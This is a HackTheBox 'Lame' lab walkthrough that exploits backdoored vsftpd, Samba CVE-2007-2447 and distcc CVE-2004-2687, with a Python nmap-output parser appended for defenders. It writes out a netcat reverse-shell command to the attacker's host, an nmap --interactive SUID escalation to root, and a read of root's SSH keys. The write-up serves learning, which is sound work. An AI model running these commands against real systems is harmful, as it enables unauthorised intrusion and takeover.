HackTheBox - Lame Walkthrough

July 10, 2019

Lame

I decided to start HackTheBox from the beginning and do a writeup while doing every box. The first one in the list is Lame, an easy box based on Metasploitable. I hope these posts can help someone other than me, but in the end I'm doing them for learning and note taking. If you have any complaints, suggestions or questions, hit me up on Twitter.

1. Recon and Information gathering

Nmap

root@warmachine:/hackthebox/lame# nmap -sV -sC 10.10.10.3 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 21:14 EEST
Nmap scan report for 10.10.10.3
Host is up (0.044s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.25
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h01m54s, deviation: 0s, median: -2d23h01m54s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-07-07T11:12:55-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.99 seconds

SERVICES

FTP

With my first look at the nmap results I notice the vsftpd version, 2.3.4, and I know I have "something" here :) A quick search with searchsploit yields the results I remember:

root@warmachine:/hackthebox/lame# searchsploit vsftpd
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                      | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                      | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                      | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                                                                    | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                              | exploits/unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------

I’ll leave this for a minute and check the other services.

SMB

nmap tells me the SMB ports, 139 and 445, are open. I'll take a look at those after playing with the FTP service.

2. Gaining foothold/Exploiting

Now, the FTP service. That version of vsftpd is backdoored: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html. Let's copy the script from the searchsploit result to my working directory:

root@warmachine:/hackthebox/lame# searchsploit -m exploits/unix/remote/17491.rb
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/17491
     Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /hackthebox/lame/17491.rb

The script is for Metasploit, but since I have some far away plans of taking the OSCP, I'll do my best to skip using it (or at least skip it as a primary tool…). Looking through the script, it looks like I have to send a smiley face, :), as the USER input and… uh-oh… it errors out if anonymous login is enabled. Guess I can't exploit that now. Also there are no files or folders in the anonymous FTP, what a let down :/. So I'll check SMB then:

root@warmachine:/hackthebox/lame# smbclient -L 10.10.10.3
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

Mm, now I have something more interesting. Let's check my permissions:

root@warmachine:/hackthebox/lame# smbmap -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445	Name: 10.10.10.3                                        
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	tmp                                               	READ, WRITE
	opt                                               	NO ACCESS
	IPC$                                              	NO ACCESS
	ADMIN$                                            	NO ACCESS

Oh, look at that, I can read and write to tmp… but that's not that useful at the moment.

root@warmachine:/hackthebox/lame# smbclient //10.10.10.3\\tmp
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul  7 18:48:37 2019
  ..                                 DR        0  Sun May 20 21:36:12 2012
  .ICE-unix                          DH        0  Sun Jul  7 18:10:18 2019
  .X11-unix                          DH        0  Sun Jul  7 18:10:42 2019
  .X0-lock                           HR       11  Sun Jul  7 18:10:42 2019
  5144.jsvc_up                        R        0  Sun Jul  7 18:11:24 2019

		7282168 blocks of size 1024. 5678792 blocks available
smb: \> 

Searching for Samba version 3.0.20 I get an interesting result: CVE-2007-2447, Samba "username map script" Command Execution. And since I want to skip Metasploit, some googling leads me to this script: https://gist.githubusercontent.com/joenorton8014/19aaa00e0088738fc429cff2669b9851/raw/6e1ae37e0061be103fd733b16266d26379a7f4ba/samba-usermap-exploit.py

Generating a new payload for my host, substituting it in the script, installing pysmb with pip and executing… BAM! Got root.

Ncat: Connection from 10.10.10.3:55941.
id
uid=0(root) gid=0(root)

That was easy. I'll forget I have this shell and check if there's something more.

Let's enumerate some more and check all ports:

root@warmachine:/hackthebox/lame# nmap -p- 10.10.10.3 -oN all_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 22:53 EEST
Nmap scan report for 10.10.10.3
Host is up (0.036s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Uh-oh, distccd… Now that's interesting. Googling around I found this: https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html and the NSE script https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse:

root@warmachine:/hackthebox/lame# wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
--2019-07-10 23:05:45--  https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 45.33.49.119, 2600:3c01::f03c:91ff:fe98:ff4e
Connecting to svn.nmap.org (svn.nmap.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’

/usr/share/nmap/scripts/distcc-exec.nse     100%[========================================================================================>]   3.44K  --.-KB/s    in 0s      

2019-07-10 23:05:46 (186 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]

root@warmachine:/hackthebox/lame# 
root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:06 EEST
Nmap scan report for 10.10.10.3
Host is up (0.040s latency).

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://distcc.github.io/security.html
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

Finally, let's get a shell:

root@warmachine:/hackthebox/lame# nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='/bin/nc 10.10.14.25 4747 -e /bin/sh'"
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-10 23:27 EEST


root@warmachine:/hackthebox/lame# nc -lvnp 4747
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4747
Ncat: Listening on 0.0.0.0:4747
Ncat: Connection from 10.10.10.3.
Ncat: Connection from 10.10.10.3:34633.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

3. Enumerating the system

First things first: python -c 'import pty;pty.spawn("/bin/bash")' to get a proper tty, and then LinEnum.sh.

Interesting stuff:

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr

Whoa! That's almost like Metasploitable :D Oh, wait:

daemon@lame:/tmp$ cat /root/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Not "almost like", I guess…

I'll play with the SUID binaries with the help of GTFOBins: https://gtfobins.github.io

nmap SUID

daemon@lame:/tmp$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
sh-3.2# cat /root/root.txt
cat /root/root.txt
<...>

sh-3.2# cat /home/makis/user.txt
cat /home/makis/user.txt
<...>

For some reason I couldn’t make the mtr SUID work… it errors out? :/

That's pretty much it… a lot of vulnerabilities and misconfigurations. LinEnum.sh showed more interesting stuff, but looking at it I think it was "patched" for the sake of making the machine not quite that vulnerable.
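As an added defender-side example (my own code, not part of the original writeup): a small parser for nmap's normal (-oN) output that flags the three exposures combined on this box, so the same findings can be pulled from a saved scan file instead of being read by eye. The sample scan text is constructed from the page's output, and the rule list encodes only what the page states.

```python
import re
from collections import namedtuple

# Constructed sample in nmap "normal" (-oN) format, modelled on this
# writeup's scan output; not a live capture.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd
"""

# port/proto  state  service  [version]; NSE output lines start with '|'
# and host lines with text, so neither matches.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# version is "" when nmap printed no VERSION column (e.g. a plain -p- scan)
Port = namedtuple("Port", "number proto state service version")

# (service name or None, version regex or None, note) for the issues this
# box exposes; extend the list for your own environment.
RULES = [
    (None, re.compile(r"^vsftpd 2\.3\.4\b"), "vsftpd 2.3.4: backdoored release"),
    (None, re.compile(r"^Samba smbd 3\.0\.20\b"),
     "Samba 3.0.20: CVE-2007-2447 'username map script' command execution"),
    ("distccd", None, "distccd exposed: CVE-2004-2687 command execution"),
]

def parse_nmap_normal(text):
    """One Port per port line; headers and script output are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.rstrip())
        if m:
            num, proto, state, svc, ver = m.groups()
            ports.append(Port(int(num), proto, state, svc, (ver or "").strip()))
    return ports

def flag_known_issues(ports):
    """Match open ports against RULES; returns (port, note) pairs in scan order."""
    findings = []
    for p in ports:
        for svc, pattern, note in RULES:
            if p.state == "open" and (svc is None or p.service == svc) \
                    and (pattern is None or pattern.match(p.version)):
                findings.append((p.number, note))
    return findings
```

Run it over the base_tcp.nmap and all_tcp.nmap files from the scans above; the -p- scan has no VERSION column, so only the distccd rule can fire on it.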